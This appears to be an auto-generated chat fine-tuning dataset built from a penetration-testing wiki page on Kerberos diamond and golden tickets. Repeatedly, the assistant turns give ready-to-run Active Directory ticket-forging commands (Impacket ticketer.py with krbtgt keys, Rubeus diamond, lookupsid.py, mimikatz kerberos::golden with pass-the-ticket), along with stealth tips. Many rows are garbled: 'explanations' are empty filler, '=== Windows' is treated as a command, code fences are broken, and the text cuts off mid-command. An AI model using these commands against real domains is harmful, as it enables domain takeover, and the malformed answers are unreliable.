"user": "Explain the practical steps for Diamond tickets - Practice", "response": "> [!TIP]\n> When forging tickets, before November 2021 updates, the user-id and groups-ids were useful but the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This also applies to Silver Tickets.\n\nSince Golden and Silver tickets are fully forged are not preceded by legitimate TGT (KRB_AS_REQ) or Service Ticket requests (KRB_TGS_REQ), detection rates are quite high. Diamond tickets are an alternative to obtaining similar tickets in a stealthier way.\n\nIn this scenario, an attacker that has knowledge of the service long-term key (krbtgt keys in case of a TGT, service account keys of Service Tickets) can request a legitimate ticket, decrypt the PAC, modify it, recalculate the signatures and encrypt the ticket again. This technique allows to produce a PAC that is highly similar to a legitimate one and also produces legitimate requests.\n\n::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, Impacket's ticketer (Python) script can be used for such purposes.\n\nIn its actual form (as of September 9th, 2022), the script doesn't modify the PAC in the ticket obtained but instead fully replaces it with a full-forged one. This is not the most stealthy approach as the forged PAC could embed wrong information. Testers are advised to opt for the sapphire ticket approach. On top of that, if there are some structure in the PAC that Impacket can't handle, those structures will be missing in the newly forged PAC.\n\n``bash\nticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'\n`\n\n=== Windows\n\nFrom Windows systems, Rubeus (C#) can be used for such purposes since PR#136.\n\n`powershell\nRubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:U", "metadata": {"corpus_index": 589, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use ticketer.py for diamond tickets - practice?"}, {"role": "assistant", "content": "ticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use ticketer.py for diamond tickets - practice?", "response": "ticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'", "metadata": {"corpus_index": 590, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "ticketer.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Diamond tickets - Practice"}, {"role": "assistant", "content": "ticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Diamond tickets - Practice", "response": "ticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'", "metadata": {"corpus_index": 590, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `ticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'`?"}, {"role": "assistant", "content": "This command is used for diamond tickets - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `ticketer.py -request -domain \"$DOMAIN\" -user \"$USER\" -password \"$PASSWORD\" -nthash 'krbtgt/service NT hash' -aesKey 'krbtgt/service AES key' -domain-sid 'S-1-5-21-...' -user-id '1337' -groups '512,513,518,519,520' 'baduser'`?", "response": "This command is used for diamond tickets - practice. Practice", "metadata": {"corpus_index": 590, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use Rubeus.exe for diamond tickets - practice?"}, {"role": "assistant", "content": "Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use Rubeus.exe for diamond tickets - practice?", "response": "Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS", "metadata": {"corpus_index": 591, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Rubeus.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Diamond tickets - Practice"}, {"role": "assistant", "content": "Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Diamond tickets - Practice", "response": "Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS", "metadata": {"corpus_index": 591, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS`?"}, {"role": "assistant", "content": "This command is used for diamond tickets - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Rubeus.exe diamond /domain:DOMAIN /user:USER /password:PASSWORD /dc:DOMAIN_CONTROLLER /enctype:AES256 /krbkey:HASH /ticketuser:USERNAME /ticketuserid:USER_ID /groups:GROUP_IDS`?", "response": "This command is used for diamond tickets - practice. Practice", "metadata": {"corpus_index": 591, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/diamond.md", "page_title": "Diamond tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Golden tickets - Theory?"}, {"role": "assistant", "content": "The long-term key of the krbtgt account can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain. The krbtgt's key is used to encrypt the PAC. In a Golden Ticket scenario, an attacker that has knowledge of the krbtgt long-term key, will usually forge a PAC indicating that the user belongs to privileged groups. This PAC will be embedded in a forged TGT. The TGT will be used to request Service Tickets than will then feature the PAC presented in the TGT, hence granting lots of access to the attacker."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Golden tickets - Theory?", "response": "The long-term key of the krbtgt account can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain. The krbtgt's key is used to encrypt the PAC. In a Golden Ticket scenario, an attacker that has knowledge of the krbtgt long-term key, will usually forge a PAC indicating that the user belongs to privileged groups. This PAC will be embedded in a forged TGT. The TGT will be used to request Service Tickets than will then feature the PAC presented in the TGT, hence granting lots of access to the attacker.", "metadata": {"corpus_index": 592, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Golden tickets - Theory"}, {"role": "assistant", "content": "The long-term key of the krbtgt account can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain. The krbtgt's key is used to encrypt the PAC. In a Golden Ticket scenario, an attacker that has knowledge of the krbtgt long-term key, will usually forge a PAC indicating that the user belongs to privileged groups. This PAC will be embedded in a forged TGT. The TGT will be used to request Service Tickets than will then feature the PAC presented in the TGT, hence granting lots of access to the attacker."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Golden tickets - Theory", "response": "The long-term key of the krbtgt account can be used to forge a special TGT (Ticket Granting Ticket) that can later be used with Pass-the-ticket to access any resource within the AD domain. The krbtgt's key is used to encrypt the PAC. In a Golden Ticket scenario, an attacker that has knowledge of the krbtgt long-term key, will usually forge a PAC indicating that the user belongs to privileged groups. This PAC will be embedded in a forged TGT. The TGT will be used to request Service Tickets than will then feature the PAC presented in the TGT, hence granting lots of access to the attacker.", "metadata": {"corpus_index": 592, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Golden tickets - Practice"}, {"role": "assistant", "content": "> [!IMPORTANT]\n> When forging tickets, before November 2021 updates, the user-id and groups-ids were useful but the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This also applies to Silver Tickets.\n\nIn order to craft a golden ticket, testers need to find the krbtgt's RC4 key (i.e. NT hash) or AES key (128 or 256 bits). In most cases, this can only be achieved with domain admin privileges through a DCSync attack. Because of this, golden tickets only allow lateral movement and not privilege escalation.\n\n> [!TIP]\n> Microsoft now uses AES 256 bits by default. Using this encryption algorithm (instead of giving the NThash) will be stealthier.\n\n::: tabs\n\n=== UNIX-like\n\nThere are Impacket scripts for each step of a golden ticket creation : retrieving the krbtgt, retrieving the domain SID, creating the golden ticket.\n\n```bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Golden tickets - Practice", "response": "> [!IMPORTANT]\n> When forging tickets, before November 2021 updates, the user-id and groups-ids were useful but the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This also applies to Silver Tickets.\n\nIn order to craft a golden ticket, testers need to find the krbtgt's RC4 key (i.e. NT hash) or AES key (128 or 256 bits). In most cases, this can only be achieved with domain admin privileges through a DCSync attack. Because of this, golden tickets only allow lateral movement and not privilege escalation.\n\n> [!TIP]\n> Microsoft now uses AES 256 bits by default. Using this encryption algorithm (instead of giving the NThash) will be stealthier.\n\n::: tabs\n\n=== UNIX-like\n\nThere are Impacket scripts for each step of a golden ticket creation : retrieving the krbtgt, retrieving the domain SID, creating the golden ticket.\n\n```bash", "metadata": {"corpus_index": 593, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Golden tickets - Practice"}, {"role": "assistant", "content": "> [!IMPORTANT]\n> When forging tickets, before November 2021 updates, the user-id and groups-ids were useful but the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This also applies to Silver Tickets.\n\nIn order to craft a golden ticket, testers need to find the krbtgt's RC4 key (i.e. NT hash) or AES key (128 or 256 bits). In most cases, this can only be achieved with domain admin privileges through a DCSync attack. Because of this, golden tickets only allow lateral movement and not privilege escalation.\n\n> [!TIP]\n> Microsoft now uses AES 256 bits by default. Using this encryption algorithm (instead of giving the NThash) will be stealthier.\n\n::: tabs\n\n=== UNIX-like\n\nThere are Impacket scripts for each step of a golden ticket creation : retrieving the krbtgt, retrieving the domain SID, creating the golden ticket.\n\n```bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Golden tickets - Practice", "response": "> [!IMPORTANT]\n> When forging tickets, before November 2021 updates, the user-id and groups-ids were useful but the username supplied was mostly useless. As of Nov. 2021 updates, if the username supplied doesn't exist in Active Directory, the ticket gets rejected. This also applies to Silver Tickets.\n\nIn order to craft a golden ticket, testers need to find the krbtgt's RC4 key (i.e. NT hash) or AES key (128 or 256 bits). In most cases, this can only be achieved with domain admin privileges through a DCSync attack. Because of this, golden tickets only allow lateral movement and not privilege escalation.\n\n> [!TIP]\n> Microsoft now uses AES 256 bits by default. Using this encryption algorithm (instead of giving the NThash) will be stealthier.\n\n::: tabs\n\n=== UNIX-like\n\nThere are Impacket scripts for each step of a golden ticket creation : retrieving the krbtgt, retrieving the domain SID, creating the golden ticket.\n\n```bash", "metadata": {"corpus_index": 593, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Find the domain SID in the context of penetration testing"}, {"role": "assistant", "content": "lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Find the domain SID in the context of penetration testing", "response": "lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0", "metadata": {"corpus_index": 594, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do Find the domain SID"}, {"role": "assistant", "content": "lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Find the domain SID", "response": "lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0", "metadata": {"corpus_index": 594, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about Create the golden ticket (with an RC4 key, i.e. NT hash)?"}, {"role": "assistant", "content": "ticketer.py -nthash \"$krbtgtNThash\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" \"randomuser\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about Create the golden ticket (with an RC4 key, i.e. NT hash)?", "response": "ticketer.py -nthash \"$krbtgtNThash\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" \"randomuser\"", "metadata": {"corpus_index": 595, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on Create the golden ticket (with an RC4 key, i.e. NT hash)"}, {"role": "assistant", "content": "ticketer.py -nthash \"$krbtgtNThash\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" \"randomuser\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on Create the golden ticket (with an RC4 key, i.e. NT hash)", "response": "ticketer.py -nthash \"$krbtgtNThash\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" \"randomuser\"", "metadata": {"corpus_index": 595, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of Create the golden ticket (with an AES 128/256bits key)"}, {"role": "assistant", "content": "ticketer.py -aesKey \"$krbtgtAESkey\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" \"randomuser\""}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of Create the golden ticket (with an AES 128/256bits key)", "response": "ticketer.py -aesKey \"$krbtgtAESkey\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" \"randomuser\"", "metadata": {"corpus_index": 596, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for Create the golden ticket (with an AES 128/256bits key)"}, {"role": "assistant", "content": "ticketer.py -aesKey \"$krbtgtAESkey\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" \"randomuser\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for Create the golden ticket (with an AES 128/256bits key)", "response": "ticketer.py -aesKey \"$krbtgtAESkey\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" \"randomuser\"", "metadata": {"corpus_index": 596, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids?"}, {"role": "assistant", "content": "ticketer.py -nthash \"$krbtgtNThash\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" -user-id \"$USERID\" -groups \"$GROUPID1,$GROUPID2,...\" \"randomuser\"\n``\n\n=== Windows\n\nOn Windows, mimikatz (C) can be used with kerberos::golden for this attack.\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids?", "response": "ticketer.py -nthash \"$krbtgtNThash\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" -user-id \"$USERID\" -groups \"$GROUPID1,$GROUPID2,...\" \"randomuser\"\n``\n\n=== Windows\n\nOn Windows, mimikatz (C) can be used with kerberos::golden for this attack.\n\n``bash", "metadata": {"corpus_index": 597, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids?"}, {"role": "assistant", "content": "ticketer.py -nthash \"$krbtgtNThash\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" -user-id \"$USERID\" -groups \"$GROUPID1,$GROUPID2,...\" \"randomuser\"\n``\n\n=== Windows\n\nOn Windows, mimikatz (C) can be used with kerberos::golden for this attack.\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids?", "response": "ticketer.py -nthash \"$krbtgtNThash\" -domain-sid \"$domainSID\" -domain \"$DOMAIN\" -user-id \"$USERID\" -groups \"$GROUPID1,$GROUPID2,...\" \"randomuser\"\n``\n\n=== Windows\n\nOn Windows, mimikatz (C) can be used with kerberos::golden for this attack.\n\n``bash", "metadata": {"corpus_index": 597, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids during a pentest?"}, {"role": "assistant", "content": "=== Windows\n\nOn Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) (C) can be used with [`kerberos::golden`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/golden) for this attack."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids during a pentest?", "response": "=== Windows\n\nOn Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) (C) can be used with [`kerberos::golden`](https://tools.thehacker.recipes/mimikatz/modules/kerberos/golden) for this attack.", "metadata": {"corpus_index": 598, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Windows`?"}, {"role": "assistant", "content": "This command is used for create the golden ticket (with an rc4 key, i.e. nt hash) with custom user/groups ids. Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Windows`?", "response": "This command is used for create the golden ticket (with an rc4 key, i.e. nt hash) with custom user/groups ids. Create the golden ticket (with an RC4 key, i.e. NT hash) with custom user/groups ids", "metadata": {"corpus_index": 598, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is with an NT hash?"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is with an NT hash?", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt", "metadata": {"corpus_index": 599, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for with an NT hash"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for with an NT hash", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$krbtgt_NThash /user:randomuser /ptt", "metadata": {"corpus_index": 599, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about with an AES 128 key?"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about with an AES 128 key?", "response": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$krbtgt_aes128_key /user:randomuser /ptt", "metadata": {"corpus_index": 600, "category": "active_directory", "source_file": "docs/src/ad/movement/kerberos/forged-tickets/golden.md", "page_title": "Golden tickets", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute with an AES 128 key?"}, {"role": "assistant", "content": "kerberos::golden /domain:$DOMAIN /sid:$DomainSID 